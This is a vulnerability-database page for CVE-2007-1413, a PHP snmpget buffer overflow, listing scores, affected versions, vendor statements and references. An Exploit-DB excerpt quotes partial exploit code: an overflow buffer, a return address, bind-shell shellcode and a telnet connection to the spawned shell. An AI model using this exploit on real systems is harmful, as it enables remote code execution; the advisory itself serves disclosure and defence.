CVE-2007-1413
published 2007-03-12CVE-2007-1413: Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
11.09%
95.4th percentile
Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object id).
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.2.3 | — |
| php | php | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
CVE-2007-1413: Buffer overflow in the snmpget function in the snmp extension in PHP 5
vendor_redhat·CVSS 7.5
CVE-2007-1413 [HIGH] CVE-2007-1413: Buffer overflow in the snmpget function in the snmp extension in PHP 5
Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object id).
Statement: Not vulnerable. The php-snmp package as shipped with Red Hat Enterprise Linux 4 and 5 use net-snmp which is not vulnerable to this issue.
GHSA
GHSA-j942-443j-vqgr: Buffer overflow in the snmpget function in the snmp extension in PHP 5
ghsa_unreviewed·2022-05-01
CVE-2007-1413 [HIGH] CWE-119 GHSA-j942-443j-vqgr: Buffer overflow in the snmpget function in the snmp extension in PHP 5
Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object id).
No detection rules found.
Exploit-DB
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
exploitdb·2007-08-09
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI)
---
http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
$buffer = str_repeat("A",254);
$ret = "\xD7\x98\x95\x7C"; #shell32.dll ->CALL EDI WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x
Exploit-DB
PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow
exploitdb·2007-07-20
CVE-2007-1413 PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow
PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow
---
# milw0rm.com [2007-07-20]
Exploit-DB
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow
exploitdb·2007-03-09
CVE-2007-1413 PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow
PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow
---
# milw0rm.com [2007-03-09]
http://retrogod.altervista.org/php_446_snmpget_local_bof.htmlhttp://secunia.com/advisories/24440http://www.securityfocus.com/bid/22893https://exchange.xforce.ibmcloud.com/vulnerabilities/35517https://www.exploit-db.com/exploits/3439https://www.exploit-db.com/exploits/4204http://retrogod.altervista.org/php_446_snmpget_local_bof.htmlhttp://secunia.com/advisories/24440http://www.securityfocus.com/bid/22893https://exchange.xforce.ibmcloud.com/vulnerabilities/35517https://www.exploit-db.com/exploits/3439https://www.exploit-db.com/exploits/4204
2007-03-12
Published